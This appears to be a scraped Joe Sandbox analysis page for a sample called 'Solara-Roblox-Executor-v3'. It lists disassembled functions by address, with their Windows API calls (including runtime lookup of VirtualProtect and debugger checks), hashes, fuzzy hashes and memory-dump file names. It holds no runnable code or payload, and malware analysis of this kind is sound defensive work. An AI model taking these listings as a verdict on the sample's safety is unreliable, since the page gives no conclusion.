Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: 781ac102b92681d1c59e79af2b9a988f987b3972b0fb4f9c7752eb7cbea5dee2
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: 12025DB1E022199BDF15CFA9C8906AEFBF5FF48314F258269E515E7380D731AA45CB80

Function 0030B799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ed6d3f5963cacb5856f8abfcd13160ffb26f2d0826c8c14d08cddb1e6d9119f8
Instruction ID: cf24d8ac30b336bc370e792addcc6b196c9a7d920ebea12d0ea301eb76e1225b
Opcode Fuzzy Hash: ed6d3f5963cacb5856f8abfcd13160ffb26f2d0826c8c14d08cddb1e6d9119f8
Instruction Fuzzy Hash: C271E47190615C5FDF22AF28CCA9AFAF7B8EF49300F1541D9E409A7291DB314E849F10

Function 002F9A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002F9A7F
IsDebuggerPresent.KERNEL32 ref: 002F9B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002F9B64
UnhandledExceptionFilter.KERNEL32(?), ref: 002F9B6E

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
Instruction ID: df8069bf4fc76e0afe065c92a68902d7d536987cf68e06bfe3353b8ffba49f93
Opcode Fuzzy Hash: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
Instruction Fuzzy Hash: 8D312575D0522D9BDB21EFA4D949BCDBBB8AF08340F1041EAE50CAB250EB719A848F45

Function 002F1C10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 002F1C3B
GetFileSize.KERNEL32 ref: 002F1CC3
CloseHandle.KERNEL32 ref: 002F1CDF

Strings

CreateFileA, xrefs: 002F1C2E
Pq/, xrefs: 002F1C53

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressCloseFileHandleProcSize
String ID: CreateFileA$Pq/
API String ID: 2836222988-331590095
Opcode ID: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
Instruction ID: bedc6e20c0689bbde8d745d213f420aa8c0adedb6f72d0820bfd4c0fdedde267
Opcode Fuzzy Hash: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
Instruction Fuzzy Hash: 2341B3B0D18209DFDB00EFA8D4986AEBBF0EF48354F00852DE899A7350D7759959CF92

Function 002FABB0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002FABE7
___except_validate_context_record.LIBVCRUNTIME ref: 002FABEF
_ValidateLocalCookies.LIBCMT ref: 002FAC78
__IsNonwritableInCurrentImage.LIBCMT ref: 002FACA3
_ValidateLocalCookies.LIBCMT ref: 002FACF8

Strings

Pq/, xrefs: 002FACBC, 002FAD1E
csm, xrefs: 002FAC8D

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: Pq/$csm
API String ID: 1170836740-730822195
Opcode ID: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
Instruction ID: 56d6be585b488bd76e0bdfca6849cfb0b9a6b9b2ded52928ee3ea945301bf2c8
Opcode Fuzzy Hash: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
Instruction Fuzzy Hash: 5F41F870A1121D9BCF11DF68C845AAEBBB5BF04364F148166E9189F392C731DD11CF92

Function 003141D2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,003141BD,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00314278
__alloca_probe_16.LIBCMT ref: 00314333
__alloca_probe_16.LIBCMT ref: 003143C2
__freea.LIBCMT ref: 0031440D
__freea.LIBCMT ref: 00314413
__freea.LIBCMT ref: 00314449
__freea.LIBCMT ref: 0031444F
__freea.LIBCMT ref: 0031445F

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
Instruction ID: deafa06ac2bc7d9666ee728d5b712a439a775c4b80e44c9deb9a0355c0cfb9f0
Opcode Fuzzy Hash: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
Instruction Fuzzy Hash: 0871E3329002499BDF2A9E95CC41BFF7BA9AF4D750F2A0469F914BB281DA359CC18B50

Function 003085B6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0030863C

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 0681bc504546505fd2062856053beaf49c29e4e7ca0129c5f9872ae847f0e050
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: B8B168329023559FDB178F28CCA1BEEBBA5EF55710F258165E984AF2C2DB74D801C7A0

Function 00304D4C Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00304E6B
CallUnexpected.LIBVCRUNTIME ref: 003050E4

Strings

csm, xrefs: 00304D89
csm, xrefs: 00304DF6
xf1, xrefs: 00304E62
csm, xrefs: 00304EA2

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xf1
API String ID: 2673424686-3925582995
Opcode ID: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
Instruction ID: 2abc048214e0d54a82fd9756429a194f7da16b711221aba0b6d07c22957d0397
Opcode Fuzzy Hash: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
Instruction Fuzzy Hash: 08B18EB1802209EFCF16DFA4C8619AFB7B5FF04300F15456AEA146B292D771DA61CF91

Function 00306642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00306751,00000000,00000000,00000000,00000000), ref: 00306703

Strings

api-ms-, xrefs: 00306699
ext-ms-, xrefs: 003066AD

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
Instruction ID: bd08ebe80ec6e7023f5fcdfb512efd8b01ced730dba88331c8ab5d829bd6a833
Opcode Fuzzy Hash: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
Instruction Fuzzy Hash: 21212732A03218ABD7339B24DC62B9A336C9B45770F270124FD11A72D5EB32ED20C6E0

Function 002F77F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002F77F9
std::_Lockit::_Lockit.LIBCPMT ref: 002F7804
std::_Lockit::~_Lockit.LIBCPMT ref: 002F7872

Part of subcall function 002F76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002F7707

std::locale::_Setgloballocale.LIBCPMT ref: 002F781F
_Yarn.LIBCPMT ref: 002F7835

Strings

Pq/, xrefs: 002F7841, 002F7865

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: Pq/
API String ID: 1088826258-235438668
Opcode ID: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
Instruction ID: 5adf40ed71c8e9dfb4ffe39cf687f58f2dda118b0243193acc01fb2b7f2f8de8
Opcode Fuzzy Hash: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
Instruction Fuzzy Hash: 4F01B175A141199BC70AEF20D9455BDBB66BFD93C0F14006DEA0257391CF349E62CF81

Function 002FF1F8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF22D
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF261

Strings

CorExitProcess, xrefs: 002FF237
Pq/, xrefs: 002FF250
mscoree.dll, xrefs: 002FF226

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$Pq/$mscoree.dll
API String ID: 4061214504-917158328
Opcode ID: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
Instruction ID: 5464d5ac3bc1c5591a60e20b11fddc22f85a8dfb55e9fafc6f0196a3fd278a0f
Opcode Fuzzy Hash: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
Instruction Fuzzy Hash: AF018F35950669AFDB168F54DC09BEEBBB8FB48B51F044639ED11A22D0DB759900CA80

Function 00312E9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d1f65c582e33d60484bfee0db44afd592a68bdc35443aa3adaa6353a980d5e
Instruction ID: 59b80e2238a563632371cb9d183575159ee21c0602e13858a87bee7d0f0f285f
Opcode Fuzzy Hash: 18d1f65c582e33d60484bfee0db44afd592a68bdc35443aa3adaa6353a980d5e
Instruction Fuzzy Hash: E1B1D474A04249AFDB1BEF98CC51BEEBBB5BF4D310F144158E8059B292C7719E82CB60

Function 0030446D Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00304464,002FA97D,002F9BD4), ref: 0030447B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00304489
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003044A2
SetLastError.KERNEL32(00000000,00304464,002FA97D,002F9BD4), ref: 003044F4

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
Instruction ID: 274bb2ece3b39300186914fdc91070631315c06ae7ec1d727503826cccd72438
Opcode Fuzzy Hash: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
Instruction Fuzzy Hash: 1301D47220B7166EF73B2B76BCA5A6B2788EB41774F21023DFA11594F2EF124D469240

Function 00304A73 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00304B3A
___AdjustPointer.LIBCMT ref: 00304B5D
___AdjustPointer.LIBCMT ref: 00304BF9

Strings

Pq/, xrefs: 00304AD2

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AdjustPointer
String ID: Pq/
API String ID: 1740715915-235438668
Opcode ID: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
Instruction ID: e832066d6a829be8d56f79a9e342e5fde14eb1a814dce6a6fe3970edab2bb69c
Opcode Fuzzy Hash: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
Instruction Fuzzy Hash: 645105F2606206AFDB2A8F50D8A1BBAB7A8EF04310F15452DEB45476D1D731EE50CB50

Function 00306E2A Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00306EAF
__alloca_probe_16.LIBCMT ref: 00306F78
__freea.LIBCMT ref: 00306FDF

Part of subcall function 003056F1: HeapAlloc.KERNEL32(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723

__freea.LIBCMT ref: 00306FF2
__freea.LIBCMT ref: 00306FFF

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
Instruction ID: a0a49f98b9bef3cccc85cf02c4617391e6f08627812d0c839875437a249a399e
Opcode Fuzzy Hash: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
Instruction Fuzzy Hash: C251C57260224BAFDB229F65DC62EBB7AADEF44750B160138FD04D6195EB31DC70CA60

Function 003049DC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00304C53

Strings

Pq/, xrefs: 00304D1B
csm, xrefs: 00304CE6
csm, xrefs: 00304C75

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: Pq/$csm$csm
API String ID: 3493665558-730250864
Opcode ID: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
Instruction ID: 16d26096d88cd589c83425e7f0a1c6741f06e0d2c284a79a4f949a6c62786931
Opcode Fuzzy Hash: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
Instruction Fuzzy Hash: 6A3139B2413208EBCF239F40DC1496E7B66FF48315B1A4259FE140E1A2C332CEA1DB81

Function 002F1DB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 002F1E6E

Strings

Pq/, xrefs: 002F1E9B
VirtualProtect, xrefs: 002F1E61
@, xrefs: 002F1EB7

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressProc
String ID: @$Pq/$VirtualProtect
API String ID: 190572456-3626776695
Opcode ID: 663d33104bc252a384dae2bb46bedaf037feda23c35e2d835db6daaca92e2b9e
Instruction ID: 6efb39f30c2a73682dc3d04930f98e1f595bd9538fc821bb548c1f70645aa7ba
Opcode Fuzzy Hash: 663d33104bc252a384dae2bb46bedaf037feda23c35e2d835db6daaca92e2b9e
Instruction Fuzzy Hash: D941D2B0901209DFDB04DFA9D5986EEBBF4FF08354F108429E848AB351D7759949CF91

Function 002F8F9A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002F8FA1
std::_Lockit::_Lockit.LIBCPMT ref: 002F8FAB

Part of subcall function 002F3990: std::_Lockit::_Lockit.LIBCPMT ref: 002F39BE
Part of subcall function 002F3990: std::_Lockit::~_Lockit.LIBCPMT ref: 002F39E9

std::_Lockit::~_Lockit.LIBCPMT ref: 002F901C

Strings

Pq/, xrefs: 002F9009

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: Pq/
API String ID: 1383202999-235438668
Opcode ID: 0356974ce2b5783076fc55cb83583832d88ea95cd3f5ecc2133d1a0ddffba145
Instruction ID: fe619d2017b8b345858c6f9a538db9382ac32bfa3c343d29c04f04c8b067f34a
Opcode Fuzzy Hash: 0356974ce2b5783076fc55cb83583832d88ea95cd3f5ecc2133d1a0ddffba145
Instruction Fuzzy Hash: EE01043692011D8BCB05EF64D811ABEF765AF84390F240528FA1167291CF709E628F81

Function 002F20C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 002F20E6
GetProcAddress.KERNEL32 ref: 002F20FE

Strings

kernel32.dll, xrefs: 002F20DD
FreeConsole, xrefs: 002F20F1

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
